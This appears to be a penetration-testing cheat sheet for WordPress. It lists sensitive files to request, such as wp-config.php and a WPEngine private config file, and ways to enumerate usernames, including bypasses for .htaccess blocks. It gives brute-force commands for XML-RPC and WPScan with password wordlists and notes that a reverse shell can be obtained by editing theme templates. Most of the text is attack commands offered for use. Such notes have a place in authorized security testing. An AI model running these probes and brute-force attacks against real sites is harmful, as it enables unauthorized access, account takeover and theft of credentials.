Wordpress

General & Tricks

# Username can be guessed on WordPress since the username will generate a different error message if it doesn't exist.

# Interesting files
https://monsite.com/robots.txt
https://monsite.com/feed
https://monsite.com/readme.html
https://monsite.com/xmlrpc.php

# Configuration files
https://monsite.com/.htaccess
https://monsite.com/wp-config.php

# Directory listing
https://monsite.com/wp-includes

# XML-RPC attack (https://github.com/1N3/Wordpress-XMLRPC-Brute-Force-Exploit)
# You can bruteforce users
./wp-xml-brute http://target.com/xmlrpc.php passwords.txt username1

# If by any way you can upload files, go check /upload or /uploads for your files

# Get WPEngine's config file
/_wpeprivate/config.json


Scanning and enumeration

# Enumerate users
Users can be found using ?author=XXX

# You can also use this
using /wp-json/wp/v2/users, then iterate that way /wp-json/wp/v2/users/1

# If /?author=1 is 403 Forbidden, you can bypass it
# If the .htaccess blocks "?author"
# Bypass 1 : http://xxx.fr/?x&author=1 --> http://xxx.fr/author/chris/?x
# Bypass 2 : http://lictor.fr/index.php?author=1

# Another way
/wp-json/?rest_route=/wp/v2/users
# WPScan is a great automatic tool (you can dockerise)
docker pull wpscanteam/wpscan
docker run -it --rm wpscanteam/wpscan -u https://yourblog.com [options]

# Non intrusive scan
wpscan.rb --url www.example.com

# Bruteforce users found using 50 threads
wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50

# Bruteforce on one user
wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin

# Plugins enumeration
wpscan.rb --url www.example.com --enumerate p

# Users enumeration
wpscan.rb --url www.example.com --enumerate u


Reverse Shell

# You can reverse shell by editing templates (404.php, footer.php...)